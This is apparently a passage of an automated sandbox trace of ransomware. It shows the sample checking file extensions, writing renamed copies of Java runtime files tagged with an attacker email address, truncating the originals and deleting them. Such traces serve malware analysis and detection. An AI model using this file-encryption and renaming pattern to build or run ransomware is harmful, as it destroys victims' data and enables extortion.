lpString2="1.dll") returned -1 [0196.585] lstrlenW (lpString=".ppt") returned 4 [0196.585] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0196.585] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\j2pkcs11.dll") returned 51 [0196.585] lstrlenW (lpString=".zip") returned 4 [0196.585] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0196.585] lstrlenW (lpString=".rar") returned 4 [0196.585] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0196.585] lstrlenW (lpString=".bz2") returned 4 [0196.585] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0196.585] lstrlenW (lpString=".7z") returned 3 [0196.585] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0196.585] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\j2pkcs11.dll") returned 51 [0196.585] lstrlenW (lpString=".dbf") returned 4 [0196.585] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0196.585] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\j2pkcs11.dll") returned 51 [0196.585] lstrlenW (lpString=".1cd") returned 4 [0196.585] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0196.585] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\j2pkcs11.dll") returned 51 [0196.585] lstrlenW (lpString=".jpg") returned 4 [0196.585] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0196.585] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\j2pkcs11.dll") returned 51 [0196.585] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\j2pkcs11.dll") returned 51 [0196.585] lstrlenW (lpString=".doc") returned 4 [0196.586] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0196.586] lstrlenW (lpString=".docx") returned 5 [0196.586] lstrcmpiW (lpString1=".docx", lpString2="1.dll") returned -1 [0196.586] lstrlenW (lpString=".pdf") returned 4 [0196.586] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0196.586] lstrlenW (lpString=".xls") returned 4 [0196.586] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0196.586] lstrlenW (lpString=".xlsx") returned 5 [0196.586] lstrcmpiW (lpString1=".xlsx", lpString2="1.dll") returned -1 [0196.586] lstrlenW (lpString=".ppt") returned 4 [0196.586] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0196.586] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\j2pkcs11.dll") returned 51 [0196.586] lstrlenW (lpString=".zip") returned 4 [0196.586] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0196.586] lstrlenW (lpString=".rar") returned 4 [0196.586] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0196.586] lstrlenW (lpString=".bz2") returned 4 [0196.586] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0196.586] lstrlenW (lpString=".7z") returned 3 [0196.586] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0196.586] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\j2pkcs11.dll") returned 51 [0196.586] lstrlenW (lpString=".dbf") returned 4 [0196.586] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0196.586] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\j2pkcs11.dll") returned 51 [0196.586] lstrlenW (lpString=".1cd") returned 4 [0196.586] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0196.586] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\j2pkcs11.dll") returned 51 [0196.586] lstrlenW (lpString=".jpg") returned 4 [0196.586] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0196.587] lstrcmpiW (lpString1=".exe", lpString2=".bat") returned 1 [0196.587] lstrlenW (lpString="jabswitch.exe") returned 13 [0196.587] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\jabswitch.exe" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\jabswitch.exe"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x38c [0196.587] GetFileSizeEx (in: hFile=0x38c, lpFileSize=0x389ff14 | out: lpFileSize=0x389ff14*=34368) returned 1 [0196.587] CloseHandle (hObject=0x38c) returned 1 [0196.587] GetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\jabswitch.exe" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\jabswitch.exe")) returned 0x20 [0196.587] GetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\jabswitch.exe.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\jabswitch.exe.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0196.587] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\jabswitch.exe" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\jabswitch.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x38c [0196.588] SetFilePointerEx (in: hFile=0x38c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x389fec0 | out: lpNewFilePointer=0x0) returned 1 [0196.588] SetFilePointerEx (in: hFile=0x38c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x389fec0 | out: lpNewFilePointer=0x0) returned 1 [0196.588] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\jabswitch.exe.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\jabswitch.exe.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x39c [0196.588] GetLastError () returned 0x0 [0196.588] ReadFile (in: hFile=0x38c, lpBuffer=0x426c020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x389fecc, lpOverlapped=0x0 | out: lpBuffer=0x426c020*, lpNumberOfBytesRead=0x389fecc*=0x8640, lpOverlapped=0x0) returned 1 [0196.641] WriteFile (in: hFile=0x39c, lpBuffer=0x426c020*, nNumberOfBytesToWrite=0x8650, lpNumberOfBytesWritten=0x389fc94, lpOverlapped=0x0 | out: lpBuffer=0x426c020*, lpNumberOfBytesWritten=0x389fc94*=0x8650, lpOverlapped=0x0) returned 1 [0196.643] ReadFile (in: hFile=0x38c, lpBuffer=0x426c020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x389fecc, lpOverlapped=0x0 | out: lpBuffer=0x426c020*, lpNumberOfBytesRead=0x389fecc*=0x0, lpOverlapped=0x0) returned 1 [0196.643] WriteFile (in: hFile=0x39c, lpBuffer=0x426c020*, nNumberOfBytesToWrite=0xee, lpNumberOfBytesWritten=0x389fc94, lpOverlapped=0x0 | out: lpBuffer=0x426c020*, lpNumberOfBytesWritten=0x389fc94*=0xee, lpOverlapped=0x0) returned 1 [0196.643] SetEndOfFile (hFile=0x39c) returned 1 [0196.789] CloseHandle (hObject=0x39c) returned 1 [0196.789] SetFilePointerEx (in: hFile=0x38c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x389fec0 | out: lpNewFilePointer=0x0) returned 1 [0196.789] SetEndOfFile (hFile=0x38c) returned 1 [0196.790] CloseHandle (hObject=0x38c) returned 1 [0196.790] SetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\jabswitch.exe.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x20) returned 1 [0196.867] DeleteFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\jabswitch.exe" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\jabswitch.exe")) returned 1 [0196.868] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\jabswitch.exe") returned 52 [0196.868] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\jabswitch.exe") returned 52 [0196.868] lstrlenW (lpString=".doc") returned 4 [0196.868] lstrcmpiW (lpString1=".doc", lpString2=".exe") returned -1 [0196.868] lstrlenW (lpString=".docx") returned 5 [0196.868] lstrcmpiW (lpString1=".docx", lpString2="h.exe") returned -1 [0196.868] lstrlenW (lpString=".pdf") returned 4 [0196.868] lstrcmpiW (lpString1=".pdf", lpString2=".exe") returned 1 [0196.868] lstrlenW (lpString=".xls") returned 4 [0196.868] lstrcmpiW (lpString1=".xls", lpString2=".exe") returned 1 [0196.868] lstrlenW (lpString=".xlsx") returned 5 [0196.868] lstrcmpiW (lpString1=".xlsx", lpString2="h.exe") returned -1 [0196.868] lstrlenW (lpString=".ppt") returned 4 [0196.868] lstrcmpiW (lpString1=".ppt", lpString2=".exe") returned 1 [0196.868] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\jabswitch.exe") returned 52 [0196.868] lstrlenW (lpString=".zip") returned 4 [0196.868] lstrcmpiW (lpString1=".zip", lpString2=".exe") returned 1 [0196.868] lstrlenW (lpString=".rar") returned 4 [0196.869] lstrcmpiW (lpString1=".rar", lpString2=".exe") returned 1 [0196.869] lstrlenW (lpString=".bz2") returned 4 [0196.869] lstrcmpiW (lpString1=".bz2", lpString2=".exe") returned -1 [0196.869] lstrlenW (lpString=".7z") returned 3 [0196.869] lstrcmpiW (lpString1=".7z", lpString2="exe") returned -1 [0196.869] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\jabswitch.exe") returned 52 [0196.869] lstrlenW (lpString=".dbf") returned 4 [0196.869] lstrcmpiW (lpString1=".dbf", lpString2=".exe") returned -1 [0196.869] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\jabswitch.exe") returned 52 [0196.869] lstrlenW (lpString=".1cd") returned 4 [0196.869] lstrcmpiW (lpString1=".1cd", lpString2=".exe") returned -1 [0196.869] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\jabswitch.exe") returned 52 [0196.869] lstrlenW (lpString=".jpg") returned 4 [0196.869] lstrcmpiW (lpString1=".jpg", lpString2=".exe") returned 1 [0196.869] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\jabswitch.exe") returned 52 [0196.869] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\jabswitch.exe") returned 52 [0196.869] lstrlenW (lpString=".doc") returned 4 [0196.869] lstrcmpiW (lpString1=".doc", lpString2=".exe") returned -1 [0196.869] lstrlenW (lpString=".docx") returned 5 [0196.869] lstrcmpiW (lpString1=".docx", lpString2="h.exe") returned -1 [0196.869] lstrlenW (lpString=".pdf") returned 4 [0196.869] lstrcmpiW (lpString1=".pdf", lpString2=".exe") returned 1 [0196.869] lstrlenW (lpString=".xls") returned 4 [0196.869] lstrcmpiW (lpString1=".xls", lpString2=".exe") returned 1 [0196.869] lstrlenW (lpString=".xlsx") returned 5 [0196.869] lstrcmpiW (lpString1=".xlsx", lpString2="h.exe") returned -1 [0196.869] lstrlenW (lpString=".ppt") returned 4 [0196.869] lstrcmpiW (lpString1=".ppt", lpString2=".exe") returned 1 [0196.869] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\jabswitch.exe") returned 52 [0196.869] lstrlenW (lpString=".zip") returned 4 [0196.870] lstrcmpiW (lpString1=".zip", lpString2=".exe") returned 1 [0196.870] lstrlenW (lpString=".rar") returned 4 [0196.870] lstrcmpiW (lpString1=".rar", lpString2=".exe") returned 1 [0196.870] lstrlenW (lpString=".bz2") returned 4 [0196.870] lstrcmpiW (lpString1=".bz2", lpString2=".exe") returned -1 [0196.870] lstrlenW (lpString=".7z") returned 3 [0196.870] lstrcmpiW (lpString1=".7z", lpString2="exe") returned -1 [0196.870] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\jabswitch.exe") returned 52 [0196.870] lstrlenW (lpString=".dbf") returned 4 [0196.870] lstrcmpiW (lpString1=".dbf", lpString2=".exe") returned -1 [0196.870] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\jabswitch.exe") returned 52 [0196.870] lstrlenW (lpString=".1cd") returned 4 [0196.870] lstrcmpiW (lpString1=".1cd", lpString2=".exe") returned -1 [0196.870] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\jabswitch.exe") returned 52 [0196.870] lstrlenW (lpString=".jpg") returned 4 [0196.870] lstrcmpiW (lpString1=".jpg", lpString2=".exe") returned 1 [0196.870] lstrcmpiW (lpString1=".cpl", lpString2=".bat") returned 1 [0196.870] lstrlenW (lpString="javacpl.cpl") returned 11 [0196.870] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\javacpl.cpl" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\javacpl.cpl"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3a8 [0196.871] GetFileSizeEx (in: hFile=0x3a8, lpFileSize=0x389ff14 | out: lpFileSize=0x389ff14*=187392) returned 1 [0196.871] CloseHandle (hObject=0x3a8) returned 1 [0196.871] GetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\javacpl.cpl" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\javacpl.cpl")) returned 0x20 [0196.871] GetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\javacpl.cpl.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\javacpl.cpl.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0196.871] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\javacpl.cpl" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\javacpl.cpl"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3a8 [0196.871] SetFilePointerEx (in: hFile=0x3a8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x389fec0 | out: lpNewFilePointer=0x0) returned 1 [0196.871] SetFilePointerEx (in: hFile=0x3a8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x389fec0 | out: lpNewFilePointer=0x0) returned 1 [0196.871] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\javacpl.cpl.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\javacpl.cpl.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x35c [0196.872] GetLastError () returned 0x0 [0196.872] ReadFile (in: hFile=0x3a8, lpBuffer=0x426c020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x389fecc, lpOverlapped=0x0 | out: lpBuffer=0x426c020*, lpNumberOfBytesRead=0x389fecc*=0x2dc00, lpOverlapped=0x0) returned 1 [0196.925] WriteFile (in: hFile=0x35c, lpBuffer=0x426c020*, nNumberOfBytesToWrite=0x2dc10, lpNumberOfBytesWritten=0x389fc94, lpOverlapped=0x0 | out: lpBuffer=0x426c020*, lpNumberOfBytesWritten=0x389fc94*=0x2dc10, lpOverlapped=0x0) returned 1 [0196.929] ReadFile (in: hFile=0x3a8, lpBuffer=0x426c020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x389fecc, lpOverlapped=0x0 | out: lpBuffer=0x426c020*, lpNumberOfBytesRead=0x389fecc*=0x0, lpOverlapped=0x0) returned 1 [0196.929] WriteFile (in: hFile=0x35c, lpBuffer=0x426c020*, nNumberOfBytesToWrite=0xea, lpNumberOfBytesWritten=0x389fc94, lpOverlapped=0x0 | out: lpBuffer=0x426c020*, lpNumberOfBytesWritten=0x389fc94*=0xea, lpOverlapped=0x0) returned 1 [0196.929] SetEndOfFile (hFile=0x35c) returned 1 [0196.929] CloseHandle (hObject=0x35c) returned 1 [0196.929] SetFilePointerEx (in: hFile=0x3a8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x389fec0 | out: lpNewFilePointer=0x0) returned 1 [0196.929] SetEndOfFile (hFile=0x3a8) returned 1 [0196.931] CloseHandle (hObject=0x3a8) returned 1 [0196.932] SetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\javacpl.cpl.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x20) returned 1 [0196.932] DeleteFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\javacpl.cpl" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\javacpl.cpl")) returned 1 [0196.932] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\javacpl.cpl") returned 50 [0196.932] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\javacpl.cpl") returned 50 [0196.932] lstrlenW (lpString=".doc") returned 4 [0196.932] lstrcmpiW (lpString1=".doc", lpString2=".cpl") returned 1 [0196.932] lstrlenW (lpString=".docx") returned 5 [0196.932] lstrcmpiW (lpString1=".docx", lpString2="l.cpl") returned -1 [0196.932] lstrlenW (lpString=".pdf") returned 4 [0196.932] lstrcmpiW (lpString1=".pdf", lpString2=".cpl") returned 1 [0196.932] lstrlenW (lpString=".xls") returned 4 [0196.932] lstrcmpiW (lpString1=".xls", lpString2=".cpl") returned 1 [0196.933] lstrlenW (lpString=".xlsx") returned 5 [0196.933] lstrcmpiW (lpString1=".xlsx", lpString2="l.cpl") returned -1 [0196.933] lstrlenW (lpString=".ppt") returned 4 [0196.933] lstrcmpiW (lpString1=".ppt", lpString2=".cpl") returned 1 [0196.933] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\javacpl.cpl") returned 50 [0196.933] lstrlenW (lpString=".zip") returned 4 [0196.933] lstrcmpiW (lpString1=".zip", lpString2=".cpl") returned 1 [0196.933] lstrlenW (lpString=".rar") returned 4 [0196.933] lstrcmpiW (lpString1=".rar", lpString2=".cpl") returned 1 [0196.933] lstrlenW (lpString=".bz2") returned 4 [0196.933] lstrcmpiW (lpString1=".bz2", lpString2=".cpl") returned -1 [0196.933] lstrlenW (lpString=".7z") returned 3 [0196.933] lstrcmpiW (lpString1=".7z", lpString2="cpl") returned -1 [0196.933] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\javacpl.cpl") returned 50 [0196.933] lstrlenW (lpString=".dbf") returned 4 [0196.933] lstrcmpiW (lpString1=".dbf", lpString2=".cpl") returned 1 [0196.933] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\javacpl.cpl") returned 50 [0196.933] lstrlenW (lpString=".1cd") returned 4 [0196.933] lstrcmpiW (lpString1=".1cd", lpString2=".cpl") returned -1 [0196.933] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\javacpl.cpl") returned 50 [0196.933] lstrlenW (lpString=".jpg") returned 4 [0196.933] lstrcmpiW (lpString1=".jpg", lpString2=".cpl") returned 1 [0196.933] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\javacpl.cpl") returned 50 [0196.933] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\javacpl.cpl") returned 50 [0196.933] lstrlenW (lpString=".doc") returned 4 [0196.933] lstrcmpiW (lpString1=".doc", lpString2=".cpl") returned 1 [0196.933] lstrlenW (lpString=".docx") returned 5 [0196.933] lstrcmpiW (lpString1=".docx", lpString2="l.cpl") returned -1 [0196.933] lstrlenW (lpString=".pdf") returned 4 [0196.934] lstrcmpiW (lpString1=".pdf", lpString2=".cpl") returned 1 [0196.934] lstrlenW (lpString=".xls") returned 4 [0196.934] lstrcmpiW (lpString1=".xls", lpString2=".cpl") returned 1 [0196.934] lstrlenW (lpString=".xlsx") returned 5 [0196.934] lstrcmpiW (lpString1=".xlsx", lpString2="l.cpl") returned -1 [0196.934] lstrlenW (lpString=".ppt") returned 4 [0196.934] lstrcmpiW (lpString1=".ppt", lpString2=".cpl") returned 1 [0196.934] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\javacpl.cpl") returned 50 [0196.934] lstrlenW (lpString=".zip") returned 4 [0196.934] lstrcmpiW (lpString1=".zip", lpString2=".cpl") returned 1 [0196.934] lstrlenW (lpString=".rar") returned 4 [0196.934] lstrcmpiW (lpString1=".rar", lpString2=".cpl") returned 1 [0196.934] lstrlenW (lpString=".bz2") returned 4 [0196.934] lstrcmpiW (lpString1=".bz2", lpString2=".cpl") returned -1 [0196.934] lstrlenW (lpString=".7z") returned 3 [0196.934] lstrcmpiW (lpString1=".7z", lpString2="cpl") returned -1 [0196.934] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\javacpl.cpl") returned 50 [0196.934] lstrlenW (lpString=".dbf") returned 4 [0196.934] lstrcmpiW (lpString1=".dbf", lpString2=".cpl") returned 1 [0196.934] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\javacpl.cpl") returned 50 [0196.934] lstrlenW (lpString=".1cd") returned 4 [0196.934] lstrcmpiW (lpString1=".1cd", lpString2=".cpl") returned -1 [0196.935] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\javacpl.cpl") returned 50 [0196.935] lstrlenW (lpString=".jpg") returned 4 [0196.935] lstrcmpiW (lpString1=".jpg", lpString2=".cpl") returned 1 [0196.935] lstrcmpiW (lpString1=".dll", lpString2=".bat") returned 1 [0196.935] lstrlenW (lpString="javafx_iio.dll") returned 14 [0196.935] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\javafx_iio.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\javafx_iio.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3a8 [0196.936] GetFileSizeEx (in: hFile=0x3a8, lpFileSize=0x389ff14 | out: lpFileSize=0x389ff14*=128064) returned 1 [0196.936] CloseHandle (hObject=0x3a8) returned 1 [0196.936] GetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\javafx_iio.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\javafx_iio.dll")) returned 0x20 [0196.936] GetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\javafx_iio.dll.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\javafx_iio.dll.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0196.936] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\javafx_iio.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\javafx_iio.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3a8 [0196.936] SetFilePointerEx (in: hFile=0x3a8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x389fec0 | out: lpNewFilePointer=0x0) returned 1 [0196.936] SetFilePointerEx (in: hFile=0x3a8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x389fec0 | out: lpNewFilePointer=0x0) returned 1 [0196.936] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\javafx_iio.dll.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\javafx_iio.dll.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x35c [0196.937] GetLastError () returned 0x0 [0196.937] ReadFile (in: hFile=0x3a8, lpBuffer=0x426c020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x389fecc, lpOverlapped=0x0 | out: lpBuffer=0x426c020*, lpNumberOfBytesRead=0x389fecc*=0x1f440, lpOverlapped=0x0) returned 1 [0197.005] WriteFile (in: hFile=0x35c, lpBuffer=0x426c020*, nNumberOfBytesToWrite=0x1f450, lpNumberOfBytesWritten=0x389fc94, lpOverlapped=0x0 | out: lpBuffer=0x426c020*, lpNumberOfBytesWritten=0x389fc94*=0x1f450, lpOverlapped=0x0) returned 1 [0197.008] ReadFile (in: hFile=0x3a8, lpBuffer=0x426c020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x389fecc, lpOverlapped=0x0 | out: lpBuffer=0x426c020*, lpNumberOfBytesRead=0x389fecc*=0x0, lpOverlapped=0x0) returned 1 [0197.008] WriteFile (in: hFile=0x35c, lpBuffer=0x426c020*, nNumberOfBytesToWrite=0xf0, lpNumberOfBytesWritten=0x389fc94, lpOverlapped=0x0 | out: lpBuffer=0x426c020*, lpNumberOfBytesWritten=0x389fc94*=0xf0, lpOverlapped=0x0) returned 1 [0197.008] SetEndOfFile (hFile=0x35c) returned 1 [0197.009] CloseHandle (hObject=0x35c) returned 1 [0197.009] SetFilePointerEx (in: hFile=0x3a8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x389fec0 | out: lpNewFilePointer=0x0) returned 1 [0197.009] SetEndOfFile (hFile=0x3a8) returned 1 [0197.010] CloseHandle (hObject=0x3a8) returned 1 [0197.012] SetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\javafx_iio.dll.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x20) returned 1 [0197.012] DeleteFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\javafx_iio.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\javafx_iio.dll")) returned 1 [0197.012] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\javafx_iio.dll") returned 53 [0197.012] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\javafx_iio.dll") returned 53 [0197.012] lstrlenW (lpString=".doc") returned 4 [0197.012] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0197.012] lstrlenW (lpString=".docx") returned 5 [0197.012] lstrcmpiW (lpString1=".docx", lpString2="o.dll") returned -1 [0197.012] lstrlenW (lpString=".pdf") returned 4 [0197.013] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0197.013] lstrlenW (lpString=".xls") returned 4 [0197.013] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0197.013] lstrlenW (lpString=".xlsx") returned 5 [0197.013] lstrcmpiW (lpString1=".xlsx", lpString2="o.dll") returned -1 [0197.013] lstrlenW (lpString=".ppt") returned 4 [0197.013] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0197.013] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\javafx_iio.dll") returned 53 [0197.013] lstrlenW (lpString=".zip") returned 4 [0197.013] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0197.013] lstrlenW (lpString=".rar") returned 4 [0197.013] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0197.013] lstrlenW (lpString=".bz2") returned 4 [0197.013] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0197.013] lstrlenW (lpString=".7z") returned 3 [0197.013] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0197.013] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\javafx_iio.dll") returned 53 [0197.013] lstrlenW (lpString=".dbf") returned 4 [0197.013] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0197.013] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\javafx_iio.dll") returned 53 [0197.013] lstrlenW (lpString=".1cd") returned 4 [0197.013] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0197.013] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\javafx_iio.dll") returned 53 [0197.013] lstrlenW (lpString=".jpg") returned 4 [0197.013] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0197.013] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\javafx_iio.dll") returned 53 [0197.013] lstrlenW 